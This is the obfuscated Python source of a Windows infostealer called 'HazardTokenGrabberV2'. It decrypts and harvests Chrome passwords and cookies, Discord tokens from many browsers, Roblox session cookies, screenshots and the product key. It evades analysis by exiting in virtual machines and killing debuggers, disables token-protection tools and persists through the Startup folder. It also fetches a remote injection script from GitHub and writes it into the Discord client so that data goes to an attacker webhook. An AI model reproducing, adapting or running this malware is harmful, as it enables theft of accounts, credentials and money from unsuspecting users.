import os #line:1
import json #line:2
import httpx #line:3
import winreg #line:4
import ctypes #line:5
import shutil #line:6
import psutil #line:7
import asyncio #line:8
import sqlite3 #line:9
import zipfile #line:10
import threading #line:11
import subprocess #line:12
from sys import argv #line:14
from PIL import ImageGrab #line:15
from random import choice #line:16
from base64 import b64decode #line:17
from tempfile import mkdtemp #line:18
from re import findall ,match #line:19
from Crypto .Cipher import AES #line:20
from win32crypt import CryptUnprotectData #line:21
config ={'updateURL':b64decode (b64decode (b64decode ("WEBHOOK").decode ('utf-8')).decode ('utf-8')).decode ('utf-8'),'protection':"KEY_HERE",'updateBackup':b64decode ("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1JkaW1vL0Rpc2NvcmQtSW5qZWN0aW9uL21hc3Rlci9pbmplY3Rpb24uanM").decode ('utf-8'),'tryv3':True ,'tryv2':True ,'tryv1':True ,'debug':True ,'debugPrograms':["httpdebuggerui","wireshark","fiddler","regedit","cmd","taskmgr","vboxservice","df5serv","processhacker","vboxtray","vmtoolsd","vmwaretray","ida64","ollydbg","pestudio","vmwareuser","vgauthservice","vmacthlp","x96dbg","vmsrvc","x32dbg","vmusrvc","prl_cc","prl_tools","xenservice","qemu-ga","joeboxcontrol","ksdumperclient","ksdumper","joeboxserver"]}#line:74
Victim =os .getlogin ()#line:76
Victim_pc =os .getenv ("COMPUTERNAME")#line:77
ram =str (psutil .virtual_memory ()[0 ]/1024 **3 ).split (".")[0 ]#line:78
disk =str (psutil .disk_usage ('/')[0 ]/1024 **3 ).split (".")[0 ]#line:79
class Functions (object ):#line:82
@staticmethod #line:83
def get_headers (OO0O00O0000OOOO00 :str =None ):#line:84
O0OOOO00OOOO0OOO0 ={"Content-Type":"application/json",}#line:87
if OO0O00O0000OOOO00 :#line:88
O0OOOO00OOOO0OOO0 .update ({"Authorization":OO0O00O0000OOOO00 })#line:89
return O0OOOO00OOOO0OOO0 #line:90
@staticmethod #line:92
def get_master_key (OO00000O0000OO0OO )->str :#line:93
with open (OO00000O0000OO0OO ,"r",encoding ="utf-8")as OO0O00OO00OOOOOO0 :#line:94
O0OO0O0OOOOO0O0OO =OO0O00OO00OOOOOO0 .read ()#line:95
O00O00OOOOOO000OO =json .loads (O0OO0O0OOOOO0O0OO )#line:96
O00OOOO00O0000OOO =b64decode (O00O00OOOOOO000OO ["os_crypt"]["encrypted_key"])#line:98
O00OOOO00O0000OOO =O00OOOO00O0000OOO [5 :]#line:99
O00OOOO00O0000OOO =CryptUnprotectData (O00OOOO00O0000OOO ,None ,None ,None ,0 )[1 ]#line:100
return O00OOOO00O0000OOO #line:101
@staticmethod #line:103
def decrypt_val (O00OOOO00O00O0OOO ,O0O0OOO00OOOO00O0 )->str :#line:104
try :#line:105
O0OOOOOO000OO0O0O =O00OOOO00O00O0OOO [3 :15 ]#line:106
O00O0OOOOO0000O00 =O00OOOO00O00O0OOO [15 :]#line:107
O000OOO000OO0000O =AES .new (O0O0OOO00OOOO00O0 ,AES .MODE_GCM ,O0OOOOOO000OO0O0O )#line:108
OOOOO00O00000O0O0 =O000OOO000OO0000O .decrypt (O00O0OOOOO0000O00 )#line:109
OOOOO00O00000O0O0 =OOOOO00O00000O0O0 [:-16 ].decode ()#line:110
return OOOOO00O00000O0O0 #line:111
except Exception :#line:112
return "Failed to decrypt password"#line:113
@staticmethod #line:115
def fetch_conf (OOOO0OO00O0O0OOOO :str )->str or bool |None :#line:116
return config .get (OOOO0OO00O0O0OOOO )#line:117
class HazardTokenGrabberV2 (Functions ):#line:120
def __init__ (O00O0OOOOOOO0O00O ):#line:121
O00O0OOOOOOO0O00O .webhook =O00O0OOOOOOO0O00O .fetch_conf ('updateURL')#line:122
O00O0OOOOOOO0O00O .discordApi ="https://discord.com/api/v9/users/@me"#line:123
O00O0OOOOOOO0O00O .appdata =os .getenv ("localappdata")#line:124
O00O0OOOOOOO0O00O .roaming =os .getenv ("appdata")#line:125
O00O0OOOOOOO0O00O .chrome =O00O0OOOOOOO0O00O .appdata +"\\Google\\Chrome\\User Data\\"#line:126
O00O0OOOOOOO0O00O .dir =mkdtemp ()#line:127
O00O0OOOOOOO0O00O .startup_loc =O00O0OOOOOOO0O00O .roaming +"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"#line:128
O00O0OOOOOOO0O00O .hook_reg ="api/webhooks"#line:129
O00O0OOOOOOO0O00O .regex =r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"#line:130
O00O0OOOOOOO0O00O .encrypted_regex =r"dQw4w9WgXcQ:[^\"]*"#line:131
O00O0OOOOOOO0O00O .sep =os .sep #line:133
O00O0OOOOOOO0O00O .tokens =[]#line:134
O00O0OOOOOOO0O00O .robloxcookies =[]#line:135
os .makedirs (O00O0OOOOOOO0O00O .dir ,exist_ok =True )#line:137
def try_extract (O00O0O0000O0O00OO ):#line:139
def O00OO00OO0O0O000O (*O00000OOOO0OO000O ,**OO0OOO0OOO000OOOO ):#line:140
try :#line:141
O00O0O0000O0O00OO (*O00000OOOO0OO000O ,**OO0OOO0OOO000OOOO )#line:142
except Exception :#line:143
pass #line:144
return O00OO00OO0O0O000O #line:145
async def checkToken (O0OO00OOO0O000O0O ,O0OO00OOOO0O0OO00 :str )->str :#line:147
try :#line:148
O0O000OOO0O000OO0 =httpx .get (url =O0OO00OOO0O000O0O .discordApi ,headers =O0OO00OOO0O000O0O .get_headers (O0OO00OOOO0O0OO00 ),timeout =5.0 )#line:153
except (httpx ._exceptions .ConnectTimeout ,httpx ._exceptions .TimeoutException ):#line:154
pass #line:155
if O0O000OOO0O000OO0 .status_code ==200 and O0OO00OOOO0O0OO00 not in O0OO00OOO0O000O0O .tokens :#line:156
O0OO00OOO0O000O0O .tokens .append (O0OO00OOOO0O0OO00 )#line:157
async def init (O000O000OO0O000OO ):#line:159
if O000O000OO0O000OO .fetch_conf ('debug')and AntiDebug ().inVM :#line:160
os ._exit (0 )#line:161
await O000O000OO0O000OO .bypassBetterDiscord ()#line:162
await O000O000OO0O000OO .bypassTokenProtector ()#line:163
OO0O0OO0OO00O0O0O =[O000O000OO0O000OO .screenshot ,O000O000OO0O000OO .grab_tokens ,O000O000OO0O000OO .grabRobloxCookie ]#line:164
if O000O000OO0O000OO .fetch_conf ('tryv1'):#line:165
OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .hide )#line:166
if O000O000OO0O000OO .fetch_conf ('tryv3'):#line:168
await O000O000OO0O000OO .killProcesses ()#line:169
if O000O000OO0O000OO .fetch_conf ('tryv2'):#line:171
OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .startup )#line:172
if os .path .exists (O000O000OO0O000OO .chrome +'Default')and os .path .exists (O000O000OO0O000OO .chrome +'Local State'):#line:174
OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .grabPassword )#line:175
OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .grabCookies )#line:176
for OOOOOOOOO0OO0OOOO in OO0O0OO0OO00O0O0O :#line:178
OO0O0O0OO00O0OOO0 =threading .Thread (target =OOOOOOOOO0OO0OOOO ,daemon =True )#line:179
OO0O0O0OO00O0OOO0 .start ()#line:180
for O0O0O0OOOOO0O0O0O in threading .enumerate ():#line:181
try :#line:182
O0O0O0OOOOO0O0O0O .join ()#line:183
except RuntimeError :#line:184
continue #line:185
O000O000OO0O000OO .neatifyTokens ()#line:186
await O000O000OO0O000OO .injector ()#line:187
O000O000OO0O000OO .finish ()#line:188
shutil .rmtree (O000O000OO0O000OO .dir )#line:189
def hide (OOO0OO00OO000000O ):#line:191
ctypes .windll .kernel32 .SetFileAttributesW (argv [0 ],2 )#line:192
def startup (O000O00OO0OOO0OO0 ):#line:194
try :#line:195
shutil .copy2 (argv [0 ],O000O00OO0OOO0OO0 .startup_loc )#line:196
except Exception :#line:197
pass #line:198
async def injector (OO00O0O00OOOOO0O0 ):#line:200
for _O0O00O00OOOOO0O00 in os .listdir (OO00O0O00OOOOO0O0 .appdata ):#line:201
if 'discord'in _O0O00O00OOOOO0O00 .lower ():#line:202
OOOOOOO0000O0O00O =OO00O0O00OOOOO0O0 .appdata +OO00O0O00OOOOO0O0 .sep +_O0O00O00OOOOO0O00 #line:203
OOO0OO000OOO00000 =OOOOOOO0000O0O00O +OO00O0O00OOOOO0O0 .sep #line:204
for __OO00O0000O0OO0000 in os .listdir (os .path .abspath (OOOOOOO0000O0O00O )):#line:205
if match (r'app-(\d*\.\d*)*',__OO00O0000O0OO0000 ):#line:206
OOO0OOO0O0OOO00OO =os .path .abspath (OOO0OO000OOO00000 +__OO00O0000O0OO0000 )#line:207
O0O000OOO00O0O0OO =OOO0OOO0O0OOO00OO +'\\modules\\discord_desktop_core-3\\discord_desktop_core\\'#line:208
if os .path .exists (O0O000OOO00O0O0OO ):#line:209
if OO00O0O00OOOOO0O0 .startup_loc not in argv [0 ]:#line:210
try :#line:211
os .makedirs (O0O000OOO00O0O0OO +'initiation',exist_ok =True )#line:213
except PermissionError :#line:214
pass #line:215
if OO00O0O00OOOOO0O0 .hook_reg in OO00O0O00OOOOO0O0 .webhook :#line:216
O0OO0O000OOO00000 =httpx .get (OO00O0O00OOOOO0O0 .fetch_conf ('updateBackup')).text .replace ("%WEBHOOK%",OO00O0O00OOOOO0O0 .webhook )#line:217
else :#line:218
O0OO0O000OOO00000 =httpx .get (OO00O0O00OOOOO0O0 .fetch_conf ('updateBackup')).text .replace ("%WEBHOOK%",OO00O0O00OOOOO0O0 .webhook ).replace ("%WEBHOOK_KEY%",OO00O0O00OOOOO0O0 .fetch_conf ('protection'))#line:221
try :#line:222
with open (O0O000OOO00O0O0OO +'index.js','w',errors ="ignore")as O00000000O0O00O0O :#line:223
O00000000O0O00O0O .write (O0OO0O000OOO00000 )#line:224
except PermissionError :#line:225
pass #line:226
if OO00O0O00OOOOO0O0 .fetch_conf ('tryv3'):#line:227
os .startfile (OOO0OOO0O0OOO00OO +OO00O0O00OOOOO0O0 .sep +_O0O00O00OOOOO0O00 +'.exe')#line:228
async def killProcesses (O00O0O0000O0O0OOO ):#line:230
O0OO000OOOO000OO0 =O00O0O0000O0O0OOO .fetch_conf ('debugPrograms')#line:231
for OOOOO0O000O0OOOOO in ['discord','discordtokenprotector','discordcanary','discorddevelopment','discordptb']:#line:232
O0OO000OOOO000OO0 .append (OOOOO0O000O0OOOOO )#line:233
for O0000OO0OO000O0O0 in psutil .process_iter ():#line:234
if any (OO00OO000OOOO0O00 in O0000OO0OO000O0O0 .name ().lower ()for OO00OO000OOOO0O00 in O0OO000OOOO000OO0 ):#line:235
try :#line:236
O0000OO0OO000O0O0 .kill ()#line:237
except (psutil .NoSuchProcess ,psutil .AccessDenied ):#line:238
pass #line:239
async def bypassTokenProtector (OO00OOO0OO0OOO00O ):#line:241
O0O0O0OOOOO00O000 =f"{OO00OOO0OO0OOO00O.roaming}\\DiscordTokenProtector\\"#line:243
if not os .path .exists (O0O0O0OOOOO00O000 ):#line:244
return #line:245
O00O000OOO0OOO000 =O0O0O0OOOOO00O000 +"config.json"#line:246
for O0O0O0OO0O0O000O0 in ["DiscordTokenProtector.exe","ProtectionPayload.dll","secure.dat"]:#line:248
try :#line:249
os .remove (O0O0O0OOOOO00O000 +O0O0O0OO0O0O000O0 )#line:250
except FileNotFoundError :#line:251
pass #line:252
if os .path .exists (O00O000OOO0OOO000 ):#line:253
with open (O00O000OOO0OOO000 ,errors ="ignore")as OOO0OO0OOO0000OO0 :#line:254
try :#line:255
OO0O00000O0O00O00 =json .load (OOO0OO0OOO0000OO0 )#line:256
except json .decoder .JSONDecodeError :#line:257
return #line:258
OO0O00000O0O00O00 ['Rdimo_just_shit_on_this_token_protector']="https://github.com/Rdimo"#line:259
OO0O00000O0O00O00 ['auto_start']=False #line:260
OO0O00000O0O00O00 ['auto_start_discord']=False #line:261
OO0O00000O0O00O00 ['integrity']=False #line:262
OO0O00000O0O00O00 ['integrity_allowbetterdiscord']=False #line:263
OO0O00000O0O00O00 ['integrity_checkexecutable']=False #line:264
OO0O00000O0O00O00 ['integrity_checkhash']=False #line:265
OO0O00000O0O00O00 ['integrity_checkmodule']=False #line:266
OO0O00000O0O00O00 ['integrity_checkscripts']=False #line:267
OO0O00000O0O00O00 ['integrity_checkresource']=False #line:268
OO0O00000O0O00O00 ['integrity_redownloadhashes']=False #line:269
OO0O00000O0O00O00 ['iterations_iv']=364 #line:270
OO0O00000O0O00O00 ['iterations_key']=457 #line:271
OO0O00000O0O00O00 ['version']=69420 #line:272
with open (O00O000OOO0OOO000 ,'w')as OOO0OO0OOO0000OO0 :#line:273
json .dump (OO0O00000O0O00O00 ,OOO0OO0OOO0000OO0 ,indent =2 ,sort_keys =True )#line:274
with open (O00O000OOO0OOO000 ,'a')as OOO0OO0OOO0000OO0 :#line:275
OOO0OO0OOO0000OO0 .write ("\n\n//Rdimo just shit on this token protector | https://github.com/Rdimo")#line:276
async def bypassBetterDiscord (O00OO00O0O00O0000 ):#line:278
O00OO000OOO000OO0 =O00OO00O0O00O0000 .roaming +"\\BetterDiscord\\data\\betterdiscord.asar"#line:279
if os .path .exists (O00OO000OOO000OO0 ):#line:280
O0OOO0OOO0OOO0OOO =O00OO00O0O00O0000 .hook_reg #line:281
with open (O00OO000OOO000OO0 ,'r',encoding ="cp437",errors ='ignore')as OOOOOOOOOO000OOO0 :#line:282
O0000O0OO0000O000 =OOOOOOOOOO000OOO0 .read ()#line:283
O0OO00OOOOO0OOOOO =O0000O0OO0000O000 .replace (O0OOO0OOO0OOO0OOO ,'RdimoTheGoat')#line:284
with open (O00OO000OOO000OO0 ,'w',newline ='',encoding ="cp437",errors ='ignore')as OOOOOOOOOO000OOO0 :#line:285
OOOOOOOOOO000OOO0 .write (O0OO00OOOOO0OOOOO )#line:286
def getProductValues (OOO000OOOO00OOOOO ):#line:288
try :#line:289
O0O0O0O0000O00OOO =subprocess .check_output (r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault",creationflags =0x08000000 ).decode ().rstrip ()#line:292
except Exception :#line:293
O0O0O0O0000O00OOO ="N/A (Likely Pirated)"#line:294
try :#line:295
OOO0000000OO000O0 =subprocess .check_output (r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName",creationflags =0x08000000 ).decode ().rstrip ()#line:297
except Exception :#line:298
OOO0000000OO000O0 ="N/A"#line:299
return [OOO0000000OO000O0 ,O0O0O0O0000O00OOO ]#line:300
@try_extract #line:302
def grab_tokens (O0O00O0000OOO00OO ):#line:303
O0O0O000O0OO000O0 ={'Discord':O0O00O0000OOO00OO .roaming +'\\discord\\Local Storage\\leveldb\\','Discord Canary':O0O00O0000OOO00OO .roaming +'\\discordcanary\\Local Storage\\leveldb\\','Lightcord':O0O00O0000OOO00OO .roaming +'\\Lightcord\\Local Storage\\leveldb\\','Discord PTB':O0O00O0000OOO00OO .roaming +'\\discordptb\\Local Storage\\leveldb\\','Opera':O0O00O0000OOO00OO .roaming +'\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\','Opera GX':O0O00O0000OOO00OO .roaming +'\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\','Amigo':O0O00O0000OOO00OO .appdata +'\\Amigo\\User Data\\Local Storage\\leveldb\\','Torch':O0O00O0000OOO00OO .appdata +'\\Torch\\User Data\\Local Storage\\leveldb\\','Kometa':O0O00O0000OOO00OO .appdata +'\\Kometa\\User Data\\Local Storage\\leveldb\\','Orbitum':O0O00O0000OOO00OO .appdata +'\\Orbitum\\User Data\\Local Storage\\leveldb\\','CentBrowser':O0O00O0000OOO00OO .appdata +'\\CentBrowser\\User Data\\Local Storage\\leveldb\\','7Star':O0O00O0000OOO00OO .appdata +'\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\','Sputnik':O0O00O0000OOO00OO .appdata +'\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\','Vivaldi':O0O00O0000OOO00OO .appdata +'\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\','Chrome SxS':O0O00O0000OOO00OO .appdata +'\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\','Chrome':O0O00O0000OOO00OO .chrome +'Default\\Local Storage\\leveldb\\','Epic Privacy Browser':O0O00O0000OOO00OO .appdata +'\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\','Microsoft Edge':O0O00O0000OOO00OO .appdata +'\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\','Uran':O0O00O0000OOO00OO .appdata +'\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\','Yandex':O0O00O0000OOO00OO .appdata +'\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\','Brave':O0O00O0000OOO00OO .appdata +'\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\','Iridium':O0O00O0000OOO00OO .appdata +'\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'}#line:327
for O0OOO0O0000000O0O ,O0000OO0OOOO0OOOO in O0O0O000O0OO000O0 .items ():#line:329
if not os .path .exists (O0000OO0OOOO0OOOO ):#line:330
continue #line:331
O00O0000O0OOOOOOO =O0OOO0O0000000O0O .replace (" ","").lower ()#line:332
if "cord"in O0000OO0OOOO0OOOO :#line:333
if os .path .exists (O0O00O0000OOO00OO .roaming +f'\\{O00O0000O0OOOOOOO}\\Local State'):#line:334
for O00OO00OOOO000OO0 in os .listdir (O0000OO0OOOO0OOOO ):#line:335
if O00OO00OOOO000OO0 [-3 :]not in ["log","ldb"]:#line:336
continue #line:337
for O0OO00O0O0O0OOO00 in [O00O0OOOO000O0000 .strip ()for O00O0OOOO000O0000 in open (f'{O0000OO0OOOO0OOOO}\\{O00OO00OOOO000OO0}',errors ='ignore').readlines ()if O00O0OOOO000O0000 .strip ()]:#line:338
for OOOOOOO00O0OOOO00 in findall (O0O00O0000OOO00OO .encrypted_regex ,O0OO00O0O0O0OOO00 ):#line:339
OOOOOO0OOOOOO0000 =O0O00O0000OOO00OO .decrypt_val (b64decode (OOOOOOO00O0OOOO00 .split ('dQw4w9WgXcQ:')[1 ]),O0O00O0000OOO00OO .get_master_key (O0O00O0000OOO00OO .roaming +f'\\{O00O0000O0OOOOOOO}\\Local State'))#line:340
asyncio .run (O0O00O0000OOO00OO .checkToken (OOOOOO0OOOOOO0000 ))#line:341
else :#line:342
for O00OO00OOOO000OO0 in os .listdir (O0000OO0OOOO0OOOO ):#line:343
if O00OO00OOOO000OO0 [-3 :]not in ["log","ldb"]:#line:344
continue #line:345
for O0OO00O0O0O0OOO00 in [O00O0O0O00OOO00OO .strip ()for O00O0O0O00OOO00OO in open (f'{O0000OO0OOOO0OOOO}\\{O00OO00OOOO000OO0}',errors ='ignore').readlines ()if O00O0O0O00OOO00OO .strip ()]:#line:346
for OOOOOO0OOOOOO0000 in findall (O0O00O0000OOO00OO .regex ,O0OO00O0O0O0OOO00 ):#line:347
asyncio .run (O0O00O0000OOO00OO .checkToken (OOOOOO0OOOOOO0000 ))#line:348
if os .path .exists (O0O00O0000OOO00OO .roaming +"\\Mozilla\\Firefox\\Profiles"):#line:350
for O0000OO0OOOO0OOOO ,_O00OO0O00OOOO0OOO ,OO0O0OOO00OOOO000 in os .walk (O0O00O0000OOO00OO .roaming +"\\Mozilla\\Firefox\\Profiles"):#line:351
for _O000OO0OOO00OO00O in OO0O0OOO00OOOO000 :#line:352
if not _O000OO0OOO00OO00O .endswith ('.sqlite'):#line:353
continue #line:354
for O0OO00O0O0O0OOO00 in [O00O0OO000OO0O0OO .strip ()for O00O0OO000OO0O0OO in open (f'{O0000OO0OOOO0OOOO}\\{_O000OO0OOO00OO00O}',errors ='ignore').readlines ()if O00O0OO000OO0O0OO .strip ()]:#line:355
for OOOOOO0OOOOOO0000 in findall (O0O00O0000OOO00OO .regex ,O0OO00O0O0O0OOO00 ):#line:356
asyncio .run (O0O00O0000OOO00OO .checkToken (OOOOOO0OOOOOO0000 ))#line:357
@try_extract #line:359
def grabPassword (O000OOOOO0OO0OOOO ):#line:360
OOOOOO0000O00O0O0 =O000OOOOO0OO0OOOO .get_master_key (O000OOOOO0OO0OOOO .chrome +'Local State')#line:361
OOO00OOOOO00O00OO =O000OOOOO0OO0OOOO .chrome +'default\\Login Data'#line:362
OOO0OO000OO0OO000 =O000OOOOO0OO0OOOO .dir +O000OOOOO0OO0OOOO .sep +"Loginvault1.db"#line:363
shutil .copy2 (OOO00OOOOO00O00OO ,OOO0OO000OO0OO000 )#line:365
O000OO00O0O0O0OOO =sqlite3 .connect (OOO0OO000OO0OO000 )#line:366
OO0OOO00OO0OOO0OO =O000OO00O0O0O0OOO .cursor ()#line:367
with open (O000OOOOO0OO0OOOO .dir +"\\Google Passwords.txt","w",encoding ="cp437",errors ='ignore')as O00OOO0O000OOOOOO :#line:368
OO0OOO00OO0OOO0OO .execute ("SELECT action_url, username_value, password_value FROM logins")#line:369
for O0O00OO000OO00OOO in OO0OOO00OO0OOO0OO .fetchall ():#line:370
OO00000OO0O0O00O0 =O0O00OO000OO00OOO [0 ]#line:371
O0OO0O0O00OOOO0OO =O0O00OO000OO00OOO [1 ]#line:372
O000O0O0OO0000O0O =O0O00OO000OO00OOO [2 ]#line:373
O0OOOOOOO00000000 =O000OOOOO0OO0OOOO .decrypt_val (O000O0O0OO0000O0O ,OOOOOO0000O00O0O0 )#line:374
if OO00000OO0O0O00O0 !="":#line:375
O00OOO0O000OOOOOO .write (f"Domain: {OO00000OO0O0O00O0}\nUser: {O0OO0O0O00OOOO0OO}\nPass: {O0OOOOOOO00000000}\n\n")#line:376
OO0OOO00OO0OOO0OO .close ()#line:377
O000OO00O0O0O0OOO .close ()#line:378
os .remove (OOO0OO000OO0OO000 )#line:379
@try_extract #line:381
def grabCookies (OO00OOO0O0000O000 ):#line:382
OO00000OOO0OOO0OO =OO00OOO0O0000O000 .get_master_key (OO00OOO0O0000O000 .chrome +'Local State')#line:383
O00O00OOO000O0OOO =OO00OOO0O0000O000 .chrome +'default\\Network\\cookies'#line:384
O0O0O0O000OO0000O =OO00OOO0O0000O000 .dir +OO00OOO0O0000O000 .sep +"Loginvault2.db"#line:385
shutil .copy2 (O00O00OOO000O0OOO ,O0O0O0O000OO0000O )#line:387
O0O000O00O0O0OOO0 =sqlite3 .connect (O0O0O0O000OO0000O )#line:388
OOOO0O000OO00OOO0 =O0O000O00O0O0OOO0 .cursor ()#line:389
with open (OO00OOO0O0000O000 .dir +"\\Google Cookies.txt","w",encoding ="cp437",errors ='ignore')as O000OOO0OO0000O0O :#line:390
OOOO0O000OO00OOO0 .execute ("SELECT host_key, name, encrypted_value from cookies")#line:391
for OOO0OO0O0O000O0O0 in OOOO0O000OO00OOO0 .fetchall ():#line:392
O000O00O000O0OOOO =OOO0OO0O0O000O0O0 [0 ]#line:393
O0OOOOO000O0000O0 =OOO0OO0O0O000O0O0 [1 ]#line:394
O0OOO00O00OOOOO00 =OO00OOO0O0000O000 .decrypt_val (OOO0OO0O0O000O0O0 [2 ],OO00000OOO0OOO0OO )#line:395
if O000O00O000O0OOOO !="":#line:396
O000OOO0OO0000O0O .write (f"Host: {O000O00O000O0OOOO}\nUser: {O0OOOOO000O0000O0}\nCookie: {O0OOO00O00OOOOO00}\n\n")#line:397
if '_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_'in O0OOO00O00OOOOO00 :#line:398
OO00OOO0O0000O000 .robloxcookies .append (O0OOO00O00OOOOO00 )#line:399
OOOO0O000OO00OOO0 .close ()#line:400
O0O000O00O0O0OOO0 .close ()#line:401
os .remove (O0O0O0O000OO0000O )#line:402
def neatifyTokens (O000O0O00OO0O000O ):#line:404
O00O0O0O00OO00OOO =open (O000O0O00OO0O000O .dir +"\\Discord Info.txt","w",encoding ="cp437",errors ='ignore')#line:405
for OOOO0O00OO000O0OO in O000O0O00OO0O000O .tokens :#line:406
OOOO0OOO00000OO0O =httpx .get (O000O0O00OO0O000O .discordApi ,headers =O000O0O00OO0O000O .get_headers (OOOO0O00OO000O0OO )).json ()#line:407
OOO0OO00000O00OO0 =OOOO0OOO00000OO0O .get ('username')+'#'+str (OOOO0OOO00000OO0O .get ("discriminator"))#line:408
O000O0OO0O000OOOO =""#line:410
OO00OOO0OOOOO0O0O =OOOO0OOO00000OO0O ['flags']#line:411
if (OO00OOO0OOOOO0O0O ==1 ):#line:412
O000O0OO0O000OOOO +="Staff, "#line:413
if (OO00OOO0OOOOO0O0O ==2 ):#line:414
O000O0OO0O000OOOO +="Partner, "#line:415
if (OO00OOO0OOOOO0O0O ==4 ):#line:416
O000O0OO0O000OOOO +="Hypesquad Event, "#line:417
if (OO00OOO0OOOOO0O0O ==8 ):#line:418
O000O0OO0O000OOOO +="Green Bughunter, "#line:419
if (OO00OOO0OOOOO0O0O ==64 ):#line:420
O000O0OO0O000OOOO +="Hypesquad Bravery, "#line:421
if (OO00OOO0OOOOO0O0O ==128 ):#line:422
O000O0OO0O000OOOO +="HypeSquad Brillance, "#line:423
if (OO00OOO0OOOOO0O0O ==256 ):#line:424
O000O0OO0O000OOOO +="HypeSquad Balance, "#line:425
if (OO00OOO0OOOOO0O0O ==512 ):#line:426
O000O0OO0O000OOOO +="Early Supporter, "#line:427
if (OO00OOO0OOOOO0O0O ==16384 ):#line:428
O000O0OO0O000OOOO +="Gold BugHunter, "#line:429
if (OO00OOO0OOOOO0O0O ==131072 ):#line:430
O000O0OO0O000OOOO +="Verified Bot Developer, "#line:431
if (O000O0OO0O000OOOO ==""):#line:432
O000O0OO0O000OOOO ="None"#line:433
OO00OOOOOO0O00000 =OOOO0OOO00000OO0O .get ("email")#line:434
O0OO0OO00OOOOO00O =OOOO0OOO00000OO0O .get ("phone")if OOOO0OOO00000OO0O .get ("phone")else "No Phone Number attached"#line:436
OO0OO000OOOOOOO0O =httpx .get (O000O0O00OO0O000O .discordApi +'/billing/subscriptions',headers =O000O0O00OO0O000O .get_headers (OOOO0O00OO000O0OO )).json ()#line:437
OO00OO0OO00000OOO =False #line:438
OO00OO0OO00000OOO =bool (len (OO0OO000OOOOOOO0O )>0 )#line:439
O0OO0OO0O00O0O0OO =bool (len (json .loads (httpx .get (O000O0O00OO0O000O .discordApi +"/billing/payment-sources",headers =O000O0O00OO0O000O .get_headers (OOOO0O00OO000O0OO )).text ))>0 )#line:440
O00O0O0O00OO00OOO .write (f"{' '*17}{OOO0OO00000O00OO0}\n{'-'*50}\nToken: {OOOO0O00OO000O0OO}\nHas Billing: {O0OO0OO0O00O0O0OO}\nNitro: {OO00OO0OO00000OOO}\nBadges: {O000O0OO0O000OOOO}\nEmail: {OO00OOOOOO0O00000}\nPhone: {O0OO0OO00OOOOO00O}\n\n")#line:441
O00O0O0O00OO00OOO .close ()#line:442
def grabRobloxCookie (O0O0OOOOOOO000OO0 ):#line:444
def OO0OO0OOO0OOO0OOO (O0O0OO00O0000O000 ):#line:445
try :#line:446
return subprocess .check_output (fr"powershell Get-ItemPropertyValue -Path {O0O0OO00O0000O000}:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY",creationflags =0x08000000 ).decode ().rstrip ()#line:449
except Exception :#line:450
return None #line:451
OO00000OOOOO000O0 =OO0OO0OOO0OOO0OOO (r'HKLM')#line:452
if not OO00000OOOOO000O0 :#line:453
OO00000OOOOO000O0 =OO0OO0OOO0OOO0OOO (r'HKCU')#line:454
if OO00000OOOOO000O0 :#line:455
O0O0OOOOOOO000OO0 .robloxcookies .append (OO00000OOOOO000O0 )#line:456
if O0O0OOOOOOO000OO0 .robloxcookies :#line:457
with open (O0O0OOOOOOO000OO0 .dir +"\\Roblox Cookies.txt","w")as OOOO00OO0O00OO00O :#line:458
for O0OOO000OOO0O0O00 in O0O0OOOOOOO000OO0 .robloxcookies :#line:459
OOOO00OO0O00OO00O .write (O0OOO000OOO0O0O00 +'\n')#line:460
def screenshot (OO00OOO0OOO0OOOO0 ):#line:462
OO000000O0O0OO0OO =ImageGrab .grab (bbox =None ,include_layered_windows =False ,all_screens =True ,xdisplay =None )#line:468
OO000000O0O0OO0OO .save (OO00OOO0OOO0OOOO0 .dir +"\\Screenshot.png")#line:469
OO000000O0O0OO0OO .close ()#line:470
def finish (O0OO0OOOO0OOOO000 ):#line:472
for OOOOOO0OO00OOOOOO in os .listdir (O0OO0OOOO0OOOO000 .dir ):#line:473
if OOOOOO0OO00OOOOOO .endswith ('.txt'):#line:474
OOOO0OO000O0OOO0O =O0OO0OOOO0OOOO000 .dir +O0OO0OOOO0OOOO000 .sep +OOOOOO0OO00OOOOOO #line:475
with open (OOOO0OO000O0OOO0O ,"r",errors ="ignore")as O0O00OO00O000OOOO :#line:476
OO00OO0000OOO000O =O0O00OO00O000OOOO .read ()#line:477
if not OO00OO0000OOO000O :#line:478
O0O00OO00O000OOOO .close ()#line:479
os .remove (OOOO0OO000O0OOO0O )#line:480
else :#line:481
with open (OOOO0OO000O0OOO0O ,"w",encoding ="utf-8",errors ="ignore")as O00O00OO0OOO00000 :#line:482
O00O00OO0OOO00000 .write ("🌟・Grabber by Quartz\n\n")#line:483
with open (OOOO0OO000O0OOO0O ,"a",encoding ="utf-8",errors ="ignore")as O00O0O000000OOOOO :#line:484
O00O0O000000OOOOO .write (OO00OO0000OOO000O +"\n\n🌟・Grabber by Quartz")#line:485
O00O0O00OO00O00OO =O0OO0OOOO0OOOO000 .getProductValues ()#line:487
